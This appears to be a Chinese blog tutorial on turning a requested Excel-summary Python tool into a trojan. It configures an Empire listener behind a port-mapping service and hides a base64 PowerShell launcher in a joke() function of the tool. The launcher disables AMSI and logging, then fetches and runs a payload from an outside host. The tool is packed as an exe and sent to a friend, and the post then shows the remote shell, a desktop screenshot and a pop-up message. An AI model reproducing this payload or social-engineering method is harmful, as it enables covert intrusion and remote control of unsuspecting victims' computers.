写个服务器搭建也要被封,都不知道错在哪里了,无力吐槽。
仅作技术交流,请勿用于非法用途。
0x00鱼的喜好
盆友叫帮忙写个程序。需求这样的,自动打开每一张表excel,把表中(包含子表)同类别后的内容统计到一张表上。
需求表.png
0x01准备鱼饵
社工才是木马的关键,如何使别人想要运行你的程序才是走向成功的第一步。对准盆友的喜好设计的程序,可以解决他工作的问题,运行程序当然是不用操心的。
如何去实现程序的功能不是本篇的重点,这里直接附上代码了,看不懂可以直接看注释,注释已经写的很细了。
#! /usr/bin/python3
# -*- coding:utf - 8 -*-
# autho:czy
# 用于表格汇总,老仁总专用
#导入模块
import xlrd
import xlsxwriter
import os
import subprocess
#打开一个excel文件
def open_xls(file):
fh=xlrd.open_workbook(file)
return fh
#获取sheet表的个数
def getshnum(fh):
x=0
#为sheet的数量
sh=getsheet(fh)
for sheet in sh:
x+=1
return x
#获取excel中所有的sheet表
def getsheet(fh):
return fh.sheets()
#读取文件内容并返回行内容
def getFilect(file,shnum):
fh=open_xls(file)
table=fh.sheets()[shnum]
# 行数
row_count = table.nrows
# 获取每行的数据
for element in range(row_count):
#第一列单元格为table_name1以此类推
table_name_1 = table.row_values(element)[0]
table_name_2 = table.row_values(element)[1]
#过滤第三列单元格的空格和换行符
table_value_temp = str(table.row_values(element)[2]).replace(" ","")
table_value = table_value_temp.replace("\n","")
#判断第一二列内容是否存在用于保存数据的字典key中
#如果存在将第三列数据保存入字典
if table_name_2 in table_data.keys():
table_data.get(table_name_2).append(table_value)
elif table_name_1 in table_data.keys():
table_data.get(table_name_1).append(table_value)
#存储最后的数据
def savefile(table_data):
#保存最后结果文件
endfile='E:\\Code\\php\\python\\excel-test\\test.xlsx'
#打开文件夹新建子表为"啦啦啦"
workbook = xlsxwriter.Workbook(endfile)
worksheet = workbook.add_worksheet('啦啦啦')
#表盒第一行内容
headings = ['类别','内容']
#接收之前的字典
data = table_data
#从A1开始以行的形式写入headings的诗句
#A2用于保存从A2开始列写入的数据,注意只能以列表的方式,每个元素一个单元格
#B2用于保存从B2开始列写入的数据,注意只能以列表的方式,每个元素一个单元格
worksheet.write_row('A1',headings)
A2 = []
B2 = []
#从字典中获取键的值
for data_key in data.keys():
#将所有键存入A2的空列表
A2.append(data_key)
#B为空字符串
B = ""
#以列表的形式遍历字典的值
for i in range(len(data[data_key])):
#将字典值中得列表依次转化为字符串连接到B
B += str(data[data_key][i])
#将已转化为字符串字典的值添加到B2列表
B2.append(B)
#A2用于保存从A2开始列写入的数据,
#B2用于保存从B2开始列写入的数据
worksheet.write_column('A2',A2)
worksheet.write_column('B2',B2)
#关闭表格
workbook.close()
if __name__=='__main__':
#定义文件夹的路径
dir_path = 'E:/Code/php/python/excel/'
#定义用于存储的字典
table_data = {"运营协作":[],"食品安全":[],"运营安全":[],"保安服务":[],"宿舍管理":[],"团队管理":[],"仓库管理":[],"店内常规工作":[],"驻店工程/信息部工作":[]}
#获取文件夹中文件的绝对路径
for fl in os.listdir(dir_path):
files_path = str(dir_path + fl)
#fh为excel表打开后返回的数据
fh=open_xls(files_path)
#x为表中sheet的数量
x=getshnum(fh)
#x为sheet的数量
for shnum in range(x):
print("正在读取文件:"+str(fl)+"的第"+str(shnum)+"个sheet表的内容...")
#rvalue=getFilect将文件添加入字典
getFilect(files_path,shnum)
for data_key in table_data.keys():
#维持原来的顺序对字典过滤重复的值
table_data[data_key] = sorted(set(table_data[data_key]),key=table_data[data_key].index)
#过滤字典中的1、(1)等符号
for z in range(len(table_data[data_key])):
for i in range(1,11):
x = str(i)+"、"
y = "(" + str(i) +")"
table_data[data_key][z] = table_data[data_key][z].replace(x,"")
table_data[data_key][z] = table_data[data_key][z].replace(y,"")
savefile(table_data)
由于表中涉及盆友公司的信息,这里测试过程就不写了。
0x02混入香料
使用渗透神器EMPIRE来实现我们使用powershell远控。
empire.png
配置监听地址
朋友和我不在一个公司,肯定是不能使用局域网远控的,这里就需要一个端口映射服务器了,这里我用的是花生壳,现在已经实名认证了,大家不要学了去干坏事哦。
内网穿透配置.png
在empire框架中输入如下命令进行监听端口的配置。
#进入监听
(Empire) > listeners
#使用http监听模式
(Empire: listeners) > uselistener http
#配置内网映射地址喝端口
(Empire: listeners/http) > set Host http://映射地址:端口
#配置本地IP地址
(Empire: listeners/http) >set BindIP 本地IP
#配置本地端口80
(Empire: listeners/http) >set Port 本地端口80
#配置监听名字
(Empire: listeners/http) >set Name test_1
#启用
(Empire: listeners/http) >execute
监听启动后,会有如下提示。1listeners currently active,一个监听已经激活
监听激活.png
输入如下命令获取powershell远控命令。
#进入监听
(Empire) > listeners
#获取powershell代码
(Empire: listeners) > launcher powershell test_1
powershell.png
0x03装饵
在刚才的程序代码中加入一个函数来运行代码咯。
def joke():
code = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQBUAFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAGEAbABVAGUAKAAkAG4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8ATABMAGUAYwBUAGkAbwBuAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAdABJAG8ATgBhAFIAWQBbAFMAdABSAGkAbgBHACwAUwBZAHMAdABlAE0ALgBPAGIAagBlAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUATABTAEUAewBbAFMAQwBSAEkAUABUAEIAbABvAGMAawBdAC4AIgBHAGUAdABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBFACgAJABuAHUATABMACwAKABOAEUAVwAtAE8AQgBqAEUAQwB0ACAAQwBPAEwAbABFAEMAdABpAE8AbgBzAC4ARwBFAE4ARQBSAEkAQwAuAEgAYQBTAGgAUwBFAHQAWwBTAFQAUgBpAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAGEAbAB1AGUAKAAkAG4AdQBMAEwALAAkAHQAcgB1AGUAKQB9ADsAfQA7AFsAUwBZAHMAVABlAE0ALgBOAGUAdAAuAFMAZQByAFYASQBjAGUAUABvAGkAbgBUAE0AYQBOAEEAZwBFAHIAXQA6ADoARQB4AHAARQBDAHQAMQAwADAAQwBPAG4AVABJAG4AVQBlAD0AMAA7ACQAdwBDAD0ATgBFAHcALQBPAGIASgBFAGMAdAAgAFMAeQBTAFQAZQBtAC4ATgBlAHQALgBXAEUAQgBDAGwAaQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBhAEQAZQBSAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBvAHgAWQA9AFsAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcAZQBiAFIAZQBxAFUARQBTAHQAXQA6ADoARABlAGYAYQBVAGwAdABXAGUAYgBQAFIATwBYAFkAOwAkAFcAQwAuAFAAUgBvAHgAWQAuAEMAUgBFAEQARQBuAFQAaQBBAEwAUwAgAD0AIABbAFMAeQBzAHQARQBNAC4ATgBlAFQALgBDAHIAZQBEAEUAbgBUAEkAYQBMAEMAYQBjAEgAZQBdADoAOgBEAGUARgBhAFUATAB0AE4AZQB0AHcAbwBSAGsAQwBSAEUARABlAG4AVABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABlAG0ALgBUAEUAWAB0AC4ARQBOAEMATwBkAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AEUAcwAoACcAOQAxADAAMgBlADgAMwBiAGQANQBlAGYAMwBiAGIANAA3AGMAMwAzADMAZgA1AGQAYwBkADkAMgBiADYAMQAyACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA4ADkANgB0ADEAdAAxADgAMwAuAGkAbwBrAC4AbABhADoAMQAzADIANgA2ACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAB3AEMALgBIAEUAQQBkAEUAcgBTAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBXAG4ARQA4AGQATQBhAHUAOABBAG0AMgAxAEQAawB0AFMAYgB5AG4AQwBQAHYAVwB3AEQARQA9ACIAKQA7ACQARABBAFQAYQA9ACQAVwBDAC4ARABvAHcAbgBsAE8AQQBEAEQAQQB0AGEAKAAkAHMARQByACsAJAB0ACkAOwAkAGkAVgA9ACQAZABhAFQAQQBbADAALgAuADMAXQA7ACQAZABhAHQAQQA9ACQARABBAHQAQQBbADQALgAuACQARABhAFQAYQAuAEwARQBuAEcAdABIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
p = subprocess.Popen(code,shell = 'True',stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.wait()
安装pyinstaller用于将Python代码封装为exe执行文件
#安装下pyinstaller
pip install pyinstaller
#进入到程序存放的路径,执行下面命令
# -F 为单个文件 -w是windows运行 -i是指定图标 test.py是之前写好的程序
pyinstaller -F -w -i heihei.ico hello.py
运行后它就会创建一个dist的文件夹,文件就在里面(送个小恶魔图标会不会提高了警惕性,哈哈哈)
木马.png
0x04抛竿
大兄弟来接住这个毒饲料。
投放毒饲料.png
0x05咬钩提竿
出现agent说明对方已经回弹自己的shell了。(名称为P3GTUSB7)
远程连接.png
代理已经成功上线
agents信息.png
输入以下命令进入shell
interact P3GTUSB7
输入sc进行桌面截图看看桌面什么样子
截图.png
win7的系统好Low
桌面.png
使用usemodule trollsploit/message模块发个消息给他看看
小窗口.png
玩笑告于段落了,我要去好好看书了,看到这篇博客的小朋友不要乱运行程序哦。
很好用.png
